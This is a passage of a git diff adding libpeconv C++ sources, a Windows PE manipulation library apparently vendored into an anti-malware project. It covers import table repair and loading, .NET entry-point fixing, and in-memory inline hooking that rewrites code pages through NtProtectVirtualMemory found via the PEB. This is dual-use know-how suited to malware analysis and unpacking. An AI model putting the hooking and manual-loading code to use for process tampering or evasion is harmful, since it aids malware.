_modulePtr, size_t _moduleSize, std::map &name_to_addr) + : ImportThunksCallback(_modulePtr, _moduleSize), nameToAddr(name_to_addr) + { + } + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) + { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = 
reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + IMAGE_THUNK_DATA32* desc = reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + +protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, T_FIELD* call_via, T_FIELD ordinal_flag) + { + DWORD call_via_rva = static_cast((ULONG_PTR)call_via - (ULONG_PTR)this->modulePtr); +#ifdef _DEBUG + std::cout << "via RVA: " << std::hex << call_via_rva << " : "; +#endif + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + if (!is_by_ord) { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + LPSTR func_name = reinterpret_cast(by_name->Name); +#ifdef _DEBUG + std::cout << "name: " << func_name << std::endl; +#endif + nameToAddr[func_name] = call_via_rva; + } + return true; + } + + std::map &nameToAddr; +}; + +DWORD find_corexemain(BYTE *buf, size_t buf_size) +{ + std::map name_to_addr; + ListImportNames callback(buf, buf_size, name_to_addr); + if (!peconv::process_import_table(buf, buf_size, &callback)) return 0; + + std::map::iterator found = name_to_addr.find("_CorExeMain"); + if (found != name_to_addr.end()) return found->second; + + found = name_to_addr.find("_CorDllMain"); + if (found != name_to_addr.end()) return found->second; + + return 0; +} + +BYTE* search_jump(BYTE *buf, size_t buf_size, const DWORD cor_exe_main_thunk, const ULONGLONG img_base) +{ + // search the jump pattern, i.e.: + //JMP DWORD NEAR [0X402000] : FF 25 00204000 + const size_t jmp_size = 2; + const BYTE jmp_pattern[jmp_size] = { 0xFF, 0x25 }; + + const size_t arg_size = sizeof(DWORD); + if ((jmp_size + arg_size) > buf_size) { + return nullptr; + } + const size_t end_offset = buf_size - (jmp_size + arg_size); + + for 
(size_t i = end_offset; // search backwards + (i + 1) != 0; // this is unsigned comparison, so we cannot do: i >= 0 + i--) // go back by one BYTE + { + if (buf[i] == jmp_pattern[0] && buf[i + 1] == jmp_pattern[1]) { // JMP + DWORD* addr = (DWORD*)(&buf[i + jmp_size]); + DWORD rva = static_cast((*addr) - img_base); + if (rva == cor_exe_main_thunk) { +#ifdef _DEBUG + std::cout << "Found call to _CorExeMain\n"; +#endif + return buf + i; + } + else { + std::cout << "[!] Mismatch: " << std::hex << rva << " vs _CorExeMain: " << cor_exe_main_thunk << std::endl; + } + } + } + return nullptr; +} + +bool fix_dot_net_ep(BYTE *pe_buffer, size_t pe_buffer_size) +{ + if (!pe_buffer) return false; + + if (peconv::is64bit(pe_buffer)) { + //64bit .NET files have EP=0 + peconv::update_entry_point_rva(pe_buffer, 0); + return true; + } + + DWORD ep_rva = peconv::get_entry_point_rva(pe_buffer); + std::cout << "[*] This is a .NET payload and may require Enty Point corection. Current EP: " << std::hex << ep_rva << "\n"; + + PIMAGE_SECTION_HEADER sec_hdr = peconv::get_section_hdr(pe_buffer, pe_buffer_size, 0); + if (!sec_hdr) return false; + + BYTE *sec_ptr = pe_buffer + sec_hdr->VirtualAddress; + if (!peconv::validate_ptr(pe_buffer, pe_buffer_size, sec_ptr, sec_hdr->SizeOfRawData)) { + return false; + } + ULONGLONG img_base = peconv::get_image_base(pe_buffer); + DWORD cor_exe_main_thunk = find_corexemain(pe_buffer, pe_buffer_size); + if (!cor_exe_main_thunk) { + return false; + } + BYTE* jump_ptr = search_jump(sec_ptr, sec_hdr->SizeOfRawData, cor_exe_main_thunk, img_base); + if (jump_ptr == nullptr) return false; + + size_t offset = jump_ptr - pe_buffer; + peconv::update_entry_point_rva(pe_buffer, static_cast(offset)); + std::cout << "[*] Found possible Entry Point: " << std::hex << offset << std::endl; + return true; +} + +bool is_dot_net(BYTE *pe_buffer, size_t pe_buffer_size) +{ + if (!pe_buffer) return false; + + IMAGE_DATA_DIRECTORY* dotnet_ptr = 
peconv::get_directory_entry(pe_buffer, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, false); + if (!dotnet_ptr) return false; + + if (peconv::get_dotnet_hdr(pe_buffer, pe_buffer_size, dotnet_ptr)) { + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h new file mode 100644 index 0000000..a7386b8 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.h @@ -0,0 +1,8 @@ +#pragma once + +#include + +bool fix_dot_net_ep(BYTE *pe_buffer, size_t pe_buffer_size); +bool is_dot_net(BYTE *pe_buffer, size_t pe_buffer_size); + +BYTE* search_jump(BYTE *buf, size_t buf_size, const DWORD cor_exe_main_thunk, const ULONGLONG img_base); diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp b/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp new file mode 100644 index 0000000..230b696 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_imports.cpp @@ -0,0 +1,306 @@ +#include "peconv/fix_imports.h" +#include "peconv/imports_uneraser.h" +#include "peconv/file_util.h" + +#include +#include + +using namespace peconv; + +template +size_t find_addresses_to_fill(FIELD_T call_via, FIELD_T thunk_addr, LPVOID modulePtr, size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT std::set &addresses) +{ + size_t addrCounter = 0; + do { + LPVOID call_via_ptr = (LPVOID)((ULONGLONG)modulePtr + call_via); + if (call_via_ptr == nullptr) break; + + LPVOID thunk_ptr = (LPVOID)((ULONGLONG)modulePtr + thunk_addr); + if (thunk_ptr == nullptr) break; + + if (!validate_ptr(modulePtr, moduleSize, thunk_ptr, sizeof(FIELD_T))) { + break; + } + if (!validate_ptr(modulePtr, moduleSize, call_via_ptr, sizeof(FIELD_T))) { + break; + } + FIELD_T *thunk_val = reinterpret_cast(thunk_ptr); + FIELD_T *call_via_val = reinterpret_cast(call_via_ptr); + if (*call_via_val == 0) { + //nothing to fill, probably the last record + break; + } + + ULONGLONG 
searchedAddr = ULONGLONG(*call_via_val); + if (exportsMap.find_export_by_va(searchedAddr) != nullptr) { + addresses.insert(searchedAddr); + addrCounter++; + } + //--- + call_via += sizeof(FIELD_T); + thunk_addr += sizeof(FIELD_T); + } while (true); + + return addrCounter; +} + +std::set get_all_dlls_exporting_function(ULONGLONG func_addr, const peconv::ExportsMapper& exportsMap) +{ + std::set currDllNames; + //1. Get all the functions from all accessible DLLs that correspond to this address: + const std::set* exports_for_va = exportsMap.find_exports_by_va(func_addr); + if (!exports_for_va) { + std::cerr << "Cannot find any DLL exporting: " << std::hex << func_addr << std::endl; + return currDllNames; //empty + } + //2. Iterate through their DLL names and add them to a set: + for (std::set::iterator strItr = exports_for_va->begin(); + strItr != exports_for_va->end(); + ++strItr) + { + currDllNames.insert(strItr->libName); + } + return currDllNames; +} + +std::set get_dlls_intersection(const std::set &dllNames, const std::set &currDllNames) +{ + std::set resultSet; + std::set_intersection(dllNames.begin(), dllNames.end(), + currDllNames.begin(), currDllNames.end(), + std::inserter(resultSet, resultSet.begin()) + ); + return resultSet; +} + +//find the name of the DLL that can cover all the addresses of imported functions +std::string find_covering_dll(std::set &addresses, const peconv::ExportsMapper& exportsMap) +{ + std::set mainDllsSet; + std::set reserveDllSet; + bool isFresh = true; + + // the earliest addresses are more significant for the final decision on what DLL to choose + // so, they should be processed at the end + std::set::iterator addrItr; + + for (addrItr = addresses.begin(); addrItr != addresses.end(); ++addrItr) { + ULONGLONG searchedAddr = *addrItr; + //--- + // 1. Find all the DLLs exporting this particular function (can be forwarded etc) + std::set currDllNames = get_all_dlls_exporting_function(searchedAddr, exportsMap); + + //2. 
Which of those DLLs covers also previous functions from this series? + if (isFresh) { + //if no other function was processed before, set the current DLL set as the total set + mainDllsSet = currDllNames; + isFresh = false; + continue; + } + // find the intersection between the total set and the current set + std::set resultSet = get_dlls_intersection(mainDllsSet, currDllNames); + if (resultSet.size() > 0) { + //found intersection, overwrite the main set + mainDllsSet = resultSet; + continue; + } + // if no intersection found in the main set, check if there is any in the reserved set: + resultSet = get_dlls_intersection(reserveDllSet, currDllNames); + if (resultSet.size() > 0) { + //found intersection, overwrite the main set + reserveDllSet = mainDllsSet; // move the current to the reserve + mainDllsSet = resultSet; + continue; + } + // no intersection found with any of the sets: + reserveDllSet = currDllNames; //set is as a reserved DLL: to be used if it will reoccur + } + if (mainDllsSet.size() > 0) { + const std::string main_dll = *(mainDllsSet.begin()); + return main_dll; + } + return ""; +} + +bool ImportedDllCoverage::findCoveringDll() +{ + std::string found_name = find_covering_dll(this->addresses, this->exportsMap); + if (found_name.length() == 0) { +#ifdef _DEBUG + std::cerr << "Cannot find a covering DLL" << std::endl; +#endif + return false; + } + this->dllName = found_name; +#ifdef _DEBUG + std::cout << "[+] Found DLL name: " << found_name << std::endl; +#endif + return true; +} + +size_t map_addresses_to_functions(std::set &addresses, + IN const std::string &chosenDll, + IN const peconv::ExportsMapper& exportsMap, + OUT std::map> &addr_to_func, + OUT std::set ¬_found +) +{ + std::set coveredAddresses; + std::set::iterator addrItr; + for (addrItr = addresses.begin(); addrItr != addresses.end(); ++addrItr) { + + ULONGLONG searchedAddr = *addrItr; + + const std::set* exports_for_va = exportsMap.find_exports_by_va(searchedAddr); + if (exports_for_va == 
nullptr) { + not_found.insert(searchedAddr); +#ifdef _DEBUG + std::cerr << "Cannot find any DLL exporting: " << std::hex << searchedAddr << std::endl; +#endif + continue; + } + + for (std::set::iterator strItr = exports_for_va->begin(); + strItr != exports_for_va->end(); + ++strItr) + { + std::string dll_name = strItr->libName; + if (dll_name != chosenDll) { + continue; + } + ExportedFunc func = *strItr; + addr_to_func[searchedAddr].insert(func); + coveredAddresses.insert(searchedAddr); + } + if (addr_to_func.find(searchedAddr) == addr_to_func.end()) { + const ExportedFunc* func = exportsMap.find_export_by_va(searchedAddr); + not_found.insert(searchedAddr); +#ifdef _DEBUG + std::cerr << "[WARNING] A function: " << func->toString() << " not found in the covering DLL: " << chosenDll << std::endl; +#endif + } + } + return coveredAddresses.size(); +} + +size_t ImportedDllCoverage::mapAddressesToFunctions(const std::string &dll) +{ + //reset all stored info: + this->mappedDllName = dll; + if (this->addrToFunc.size() > 0) { + this->addrToFunc.clear(); + } + this->notFound.clear(); + + const size_t coveredCount = map_addresses_to_functions(this->addresses, dll, this->exportsMap, this->addrToFunc, this->notFound); +#ifdef _DEBUG + if (notFound.size()) { + std::cout << "[-] Not all addresses are covered! Not found: " << std::dec << notFound.size() << std::endl; + } else { + + std::cout << "All covered!" << std::endl; + } +#endif + return coveredCount; +} + +void ImpsNotCovered::insert(ULONGLONG thunk, ULONGLONG searchedAddr) +{ +#ifdef _DEBUG + std::cerr << "[-] Function not recovered: [" << std::hex << searchedAddr << "] " << std::endl; +#endif + thunkToAddr[thunk] = searchedAddr; +} + + +bool peconv::fix_imports(IN OUT PVOID modulePtr, IN size_t moduleSize, IN const peconv::ExportsMapper& exportsMap, OUT OPTIONAL peconv::ImpsNotCovered* notCovered) +{ + bool skip_bound = false; // skip boud imports? 
+ IMAGE_DATA_DIRECTORY *importsDir = peconv::get_directory_entry((const BYTE*) modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (importsDir == NULL) { + return true; // done! no imports -> nothing to fix + } + bool is64 = peconv::is64bit((BYTE*)modulePtr); + DWORD maxSize = importsDir->Size; + DWORD impAddr = importsDir->VirtualAddress; + + IMAGE_IMPORT_DESCRIPTOR* lib_desc = NULL; + DWORD parsedSize = 0; +#ifdef _DEBUG + printf("---IMP---\n"); +#endif + + while (parsedSize < maxSize) { + + lib_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + parsedSize + (ULONG_PTR) modulePtr); + if (!validate_ptr(modulePtr, moduleSize, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + printf("[-] Invalid descriptor pointer!\n"); + return false; + } + parsedSize += sizeof(IMAGE_IMPORT_DESCRIPTOR); + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + const bool is_bound = (lib_desc->TimeDateStamp == (-1)); + if (is_bound && skip_bound) { + continue; + } +#ifdef _DEBUG + printf("Imported Lib: %x : %x : %x\n", lib_desc->FirstThunk, lib_desc->OriginalFirstThunk, lib_desc->Name); +#endif + + std::string lib_name = ""; + if (lib_desc->Name != 0) { + LPSTR name_ptr = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + if (validate_ptr(modulePtr, moduleSize, name_ptr, sizeof(char) * MIN_DLL_LEN)) { + lib_name = (LPSTR)((ULONGLONG) modulePtr + lib_desc->Name); + } + } + + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; // warning: it can be NULL! 
+ std::set addresses; + if (!is64) { + find_addresses_to_fill(call_via, thunk_addr, modulePtr, moduleSize, exportsMap, addresses); + } else { + find_addresses_to_fill(call_via, thunk_addr, modulePtr, moduleSize, exportsMap, addresses); + } + ImportedDllCoverage dllCoverage(addresses, exportsMap); + bool is_all_covered = dllCoverage.findCoveringDll(); + bool is_lib_erased = false; + + lib_name = get_dll_shortname(lib_name); //without extension + + if (lib_name.length() == 0) { + is_lib_erased = true; + if (is_all_covered) { + // set a name of the covering DLL: + lib_name = dllCoverage.dllName; + } + } + if (lib_name.length() == 0) { + //could not find a relevant DLL + continue; + } +#ifdef _DEBUG + std::cout << lib_name << std::endl; +#endif + if (!dllCoverage.mapAddressesToFunctions(lib_name)) { + // cannot find any functions imported from this DLL + continue; + } + //everything mapped, now recover it: + ImportsUneraser impUneraser(modulePtr, moduleSize); + if (!impUneraser.uneraseDllImports(lib_desc, dllCoverage, notCovered)) { + return false; + } + if (is_lib_erased) { + const std::string dll_with_ext = exportsMap.get_dll_fullname(dllCoverage.dllName); + impUneraser.uneraseDllName(lib_desc, dll_with_ext); + } + } +#ifdef _DEBUG + std::cout << "---------" << std::endl; +#endif + return true; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp b/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp new file mode 100644 index 0000000..93b9fa3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/function_resolver.cpp @@ -0,0 +1,18 @@ +#include "peconv/function_resolver.h" + +#include + +FARPROC peconv::default_func_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + HMODULE libBasePtr = LoadLibraryA(lib_name); + if (libBasePtr == NULL) { + std::cerr << "Could not load the library!" 
<< std::endl; + return NULL; + } + FARPROC hProc = GetProcAddress(libBasePtr, func_name); + if (hProc == NULL) { + std::cerr << "Could not load the function!" << std::endl; + return NULL; + } + return hProc; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp b/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp new file mode 100644 index 0000000..831920c --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/hooks.cpp @@ -0,0 +1,224 @@ +#include "peconv/hooks.h" +#include "peconv.h" +#include "peconv/peb_lookup.h" + +using namespace peconv; + +namespace peconv { + + bool is_pointer_in_ntdll(LPVOID lpAddress) + { + HMODULE mod = peconv::get_module_via_peb((LPWSTR)L"ntdll.dll"); + size_t module_size = peconv::get_module_size_via_peb(mod); + if (peconv::validate_ptr(mod, module_size, lpAddress, sizeof(BYTE))) { + return true; //this address lies within NTDLL + } + return false; + } + + BOOL nt_protect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) + { + FARPROC proc = peconv::get_exported_func( + peconv::get_module_via_peb((LPWSTR)L"ntdll.dll"), + (LPSTR)"NtProtectVirtualMemory" + ); + if (!proc) { + return FALSE; + } + NTSTATUS(NTAPI *_NtProtectVirtualMemory)( + IN HANDLE, + IN OUT PVOID*, + IN OUT PSIZE_T, + IN DWORD, + OUT PDWORD) = + (NTSTATUS(NTAPI *)( + IN HANDLE, + IN OUT PVOID*, + IN OUT PSIZE_T, + IN DWORD, + OUT PDWORD)) proc; + + SIZE_T protect_size = dwSize; + NTSTATUS status = _NtProtectVirtualMemory(GetCurrentProcess(), &lpAddress, &protect_size, flNewProtect, lpflOldProtect); + if (status != S_OK) { + return FALSE; + } + return TRUE; + } +}; + +bool PatchBackup::makeBackup(BYTE *patch_ptr, size_t patch_size) +{ + if (!patch_ptr) { + return false; + } + deleteBackup(); + this->sourcePtr = patch_ptr; + this->buffer = new BYTE[patch_size]; + this->bufferSize = patch_size; + + memcpy(buffer, patch_ptr, patch_size); + return true; +} + +bool PatchBackup::applyBackup() +{ + if (!isBackup()) { + return false; + } 
+ DWORD oldProtect = 0; + if (!nt_protect((LPVOID)sourcePtr, bufferSize, PAGE_EXECUTE_READWRITE, &oldProtect)) { + return false; + } + memcpy(sourcePtr, buffer, bufferSize); + nt_protect((LPVOID)sourcePtr, bufferSize, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), sourcePtr, bufferSize); + return true; +} + +FARPROC peconv::hooking_func_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + //the name may be ordinal rather than string, so check if it is a valid pointer: + if (!IsBadReadPtr(func_name, 1)) { + std::map::iterator itr = hooks_map.find(func_name); + if (itr != hooks_map.end()) { + FARPROC hook = itr->second; +#ifdef _DEBUG + std::cout << ">>>>>>Replacing: " << func_name << " by: " << hook << std::endl; +#endif + return hook; + } + } + return peconv::default_func_resolver::resolve_func(lib_name, func_name); +} + +size_t peconv::redirect_to_local64(void *ptr, ULONGLONG new_offset, PatchBackup* backup) +{ + if (!ptr) return 0; + + BYTE hook_64[] = { + 0x48, 0xB8, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xEE, 0xFF, //movabs rax,FFEE998877665544 + 0xFF, 0xE0 //jmp rax + }; + const size_t hook64_size = sizeof(hook_64); + if (is_pointer_in_ntdll(ptr)) { + std::cout << "[WARNING] Patching NTDLL is not allowed because of possible stability issues!\n"; + return 0; + } + DWORD oldProtect = 0; + if (!nt_protect((LPVOID)ptr, + hook64_size, + PAGE_EXECUTE_READWRITE, //this must be executable if we are hooking kernel32.dll, because we are using VirtualProtect from kernel32 at the same time + &oldProtect)) + { + return 0; + } + + if (backup != nullptr) { + backup->makeBackup((BYTE*)ptr, hook64_size); + } + memcpy(hook_64 + 2, &new_offset, sizeof(ULONGLONG)); + memcpy(ptr, hook_64, hook64_size); + + nt_protect((LPVOID)ptr, hook64_size, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), ptr, hook64_size); + return hook64_size; +} + +size_t peconv::redirect_to_local32(void *ptr, DWORD 
new_offset, PatchBackup* backup) +{ + if (!ptr) return 0; + + BYTE hook_32[] = { + 0xB8, 0xCC, 0xDD, 0xEE, 0xFF, // mov eax,FFEEDDCC + 0xFF, 0xE0 //jmp eax + }; + const size_t hook32_size = sizeof(hook_32); + if (is_pointer_in_ntdll(ptr)) { + std::cout << "[WARNING] Patching NTDLL is not allowed because of possible stability issues!\n"; + return 0; + } + DWORD oldProtect = 0; + if (!nt_protect((LPVOID)ptr, + hook32_size, + PAGE_EXECUTE_READWRITE, //this must be executable if we are hooking kernel32.dll, because we are using VirtualProtect from kernel32 at the same time + &oldProtect)) + { + return 0; + } + + if (backup != nullptr) { + backup->makeBackup((BYTE*)ptr, hook32_size); + } + memcpy(hook_32 + 1, &new_offset, sizeof(DWORD)); + memcpy(ptr, hook_32, hook32_size); + + nt_protect((LPVOID)ptr, hook32_size, oldProtect, &oldProtect); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), ptr, hook32_size); + return hook32_size; +} + +size_t peconv::redirect_to_local(void *ptr, void* new_function_ptr, PatchBackup* backup) +{ +#ifdef _WIN64 + return peconv::redirect_to_local64(ptr, (ULONGLONG)new_function_ptr, backup); +#else + return peconv::redirect_to_local32(ptr, (DWORD)new_function_ptr, backup); +#endif +} + +inline long long int get_jmp_delta(ULONGLONG currVA, int instrLen, ULONGLONG destVA) +{ + long long int diff = destVA - (currVA + instrLen); + return diff; +} + +inline bool is_valid_delta(long long int delta) +{ + DWORD first_dw = delta >> sizeof(DWORD) * 8; + if (first_dw == 0) { + return true; + } + const DWORD max_dword = DWORD(-1); + if (first_dw != max_dword) { + return false; + } + DWORD delta_dw = DWORD(delta); + if (delta_dw & 0x80000000) { + return true; + } + //invalid, sign bit is missing + return false; +} + +bool peconv::replace_target(BYTE *patch_ptr, ULONGLONG dest_addr) +{ + typedef enum { + OP_JMP = 0xE9, + OP_CALL_DWORD = 0xE8 + } t_opcode; + + if (patch_ptr[0] == OP_JMP || patch_ptr[0] == OP_CALL_DWORD) { + ULONGLONG delta = 
get_jmp_delta(ULONGLONG(patch_ptr), 5, dest_addr); + if (!is_valid_delta(delta)) { +#ifdef _DEBUG + std::cout << "Cannot replace the target: too big delta: " << std::hex << delta << std::endl; +#endif + //too big delta, cannot be saved in a DWORD + return false; + } + DWORD delta_dw = DWORD(delta); + memcpy(patch_ptr + 1, &delta_dw, sizeof(DWORD)); + + //flush cache: + FlushInstructionCache(GetCurrentProcess(), patch_ptr + 1, sizeof(DWORD)); + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp new file mode 100644 index 0000000..cabba9c --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/imports_loader.cpp @@ -0,0 +1,254 @@ +#include "peconv/imports_loader.h" + +#include + +using namespace peconv; + +class FillImportThunks : public ImportThunksCallback +{ +public: + FillImportThunks(BYTE* _modulePtr, size_t _moduleSize, t_function_resolver* func_resolver) + : ImportThunksCallback(_modulePtr, _moduleSize), funcResolver(func_resolver) + { + } + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, ULONG_PTR firstThunkPtr) + { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + else { + IMAGE_THUNK_DATA32* desc = reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl(lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + } + +protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, T_FIELD* call_via, T_FIELD ordinal_flag) + { + if (!this->funcResolver) { + return false; + } + + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + + FARPROC hProc = nullptr; + if (is_by_ord) { + + T_FIELD raw_ordinal = desc->u1.Ordinal & (~ordinal_flag); +#ifdef _DEBUG + 
std::cout << "raw ordinal: " << std::hex << raw_ordinal << std::endl; +#endif + + //hProc = funcResolver->resolve_func(lib_name, MAKEINTRESOURCEA(raw_ordinal)); + return true; + } + else { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + LPSTR func_name = reinterpret_cast(by_name->Name); +#ifdef _DEBUG + std::cout << "name: " << func_name << std::endl; +#endif + hProc = this->funcResolver->resolve_func(lib_name, func_name); + } + if (!hProc) { +#ifdef _DEBUG + std::cerr << "Could not resolve the function!" << std::endl; +#endif + return false; + } + (*call_via) = reinterpret_cast(hProc); + return true; + } + + //fields: + t_function_resolver* funcResolver; +}; + + +template +bool process_imp_functions_tpl(BYTE* modulePtr, size_t module_size, LPSTR lib_name, DWORD call_via, DWORD thunk_addr, IN ImportThunksCallback *callback) +{ + bool is_ok = true; + + T_FIELD *thunks = (T_FIELD*)((ULONGLONG)modulePtr + thunk_addr); + T_FIELD *callers = (T_FIELD*)((ULONGLONG)modulePtr + call_via); + + for (size_t index = 0; true; index++) { + if (!validate_ptr(modulePtr, module_size, &callers[index], sizeof(T_FIELD))) { + break; + } + if (!validate_ptr(modulePtr, module_size, &thunks[index], sizeof(T_FIELD))) { + break; + } + if (callers[index] == 0) { + //nothing to fill, probably the last record + return true; + } + LPVOID thunk_ptr = &thunks[index]; + T_IMAGE_THUNK_DATA* desc = reinterpret_cast(thunk_ptr); + if (!validate_ptr(modulePtr, module_size, desc, sizeof(T_IMAGE_THUNK_DATA))) { + break; + } + if (desc->u1.Function == NULL) { + break; + } + T_FIELD ordinal_flag = (sizeof(T_FIELD) == sizeof(ULONGLONG)) ? 
IMAGE_ORDINAL_FLAG64 : IMAGE_ORDINAL_FLAG32; + bool is_by_ord = (desc->u1.Ordinal & ordinal_flag) != 0; + if (!is_by_ord) { + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + desc->u1.AddressOfData); + if (!validate_ptr(modulePtr, module_size, by_name, sizeof(IMAGE_IMPORT_BY_NAME))) { + break; + } + } + //when the callback is called, all the pointers should be already verified + if (!callback->processThunks(lib_name, (ULONG_PTR)&thunks[index], (ULONG_PTR)&callers[index])) { + is_ok = false; + } + } + return is_ok; +} + +//Walk through the table of imported DLLs (starting from the given descriptor) and execute the callback each time when the new record was found +bool process_dlls(BYTE* modulePtr, size_t module_size, IMAGE_IMPORT_DESCRIPTOR *first_desc, IN ImportThunksCallback *callback) +{ + bool isAllFilled = true; +#ifdef _DEBUG + std::cout << "---IMP---" << std::endl; +#endif + const bool is64 = is64bit((BYTE*)modulePtr); + IMAGE_IMPORT_DESCRIPTOR* lib_desc = nullptr; + + for (size_t i = 0; true; i++) { + lib_desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + break; + } + if (lib_desc->OriginalFirstThunk == NULL && lib_desc->FirstThunk == NULL) { + break; + } + LPSTR lib_name = (LPSTR)((ULONGLONG)modulePtr + lib_desc->Name); + if (!peconv::is_valid_import_name(modulePtr, module_size, lib_name)) { + //invalid name + return false; + } + DWORD call_via = lib_desc->FirstThunk; + DWORD thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) { + thunk_addr = lib_desc->FirstThunk; + } +#ifdef _DEBUG + std::cout << "Imported Lib: " << std::hex << lib_desc->FirstThunk << " : " << std::hex << lib_desc->OriginalFirstThunk << " : " << lib_desc->Name << std::endl; +#endif + size_t all_solved = false; + if (is64) { + all_solved = process_imp_functions_tpl(modulePtr, module_size, lib_name, call_via, thunk_addr, callback); + } + else { + all_solved = 
process_imp_functions_tpl(modulePtr, module_size, lib_name, call_via, thunk_addr, callback); + } + if (!all_solved) { + isAllFilled = false; + } + } +#ifdef _DEBUG + printf("---------\n"); +#endif + return isAllFilled; +} + +bool peconv::process_import_table(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ImportThunksCallback *callback) +{ + if (moduleSize == 0) { //if not given, try to fetch + moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + } + if (moduleSize == 0) return false; + + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (!importsDir) { + return true; //no import table + } + const DWORD impAddr = importsDir->VirtualAddress; + IMAGE_IMPORT_DESCRIPTOR *first_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + (ULONG_PTR)modulePtr); + if (!peconv::validate_ptr(modulePtr, moduleSize, first_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + return false; + } + return process_dlls(modulePtr, moduleSize, first_desc, callback); +} + +bool peconv::load_imports(BYTE* modulePtr, t_function_resolver* func_resolver) +{ + size_t moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + if (moduleSize == 0) return false; + + bool is64 = is64bit((BYTE*)modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + + FillImportThunks callback(modulePtr, moduleSize, func_resolver); + return peconv::process_import_table(modulePtr, moduleSize, &callback); +} + +// A valid name must contain printable characters. 
Empty name is also acceptable (may have been erased) +bool peconv::is_valid_import_name(const PBYTE modulePtr, const size_t moduleSize, LPSTR lib_name) +{ + while (true) { + if (!peconv::validate_ptr(modulePtr, moduleSize, lib_name, sizeof(char))) { + return false; + } + char next_char = *lib_name; + if (next_char == '\0') break; + + if (next_char <= 0x20 || next_char >= 0x7E) { + return false; + } + lib_name++; + } + return true; +} + +bool peconv::has_valid_import_table(const PBYTE modulePtr, size_t moduleSize) +{ + IMAGE_DATA_DIRECTORY *importsDir = get_directory_entry((BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_IMPORT); + if (importsDir == NULL) return false; + + const DWORD impAddr = importsDir->VirtualAddress; + + IMAGE_IMPORT_DESCRIPTOR* lib_desc = NULL; + DWORD parsedSize = 0; + size_t valid_records = 0; + + while (true) { //size of the import table doesn't matter + lib_desc = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + parsedSize + (ULONG_PTR)modulePtr); + if (!peconv::validate_ptr(modulePtr, moduleSize, lib_desc, sizeof(IMAGE_IMPORT_DESCRIPTOR))) { + return false; + } + parsedSize += sizeof(IMAGE_IMPORT_DESCRIPTOR); 